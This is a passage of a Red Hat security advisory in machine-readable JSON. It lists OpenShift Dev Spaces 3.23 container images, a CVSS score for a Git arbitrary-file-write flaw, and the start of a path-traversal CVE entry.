            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "git: Git arbitrary file writes"
    },
    {
      "cve": "CVE-2025-48387",
      "cwe": {
        "id": "CWE-22",
        "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
      },
      "discovery_date": "2025-06-02T20:00:45.526571+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
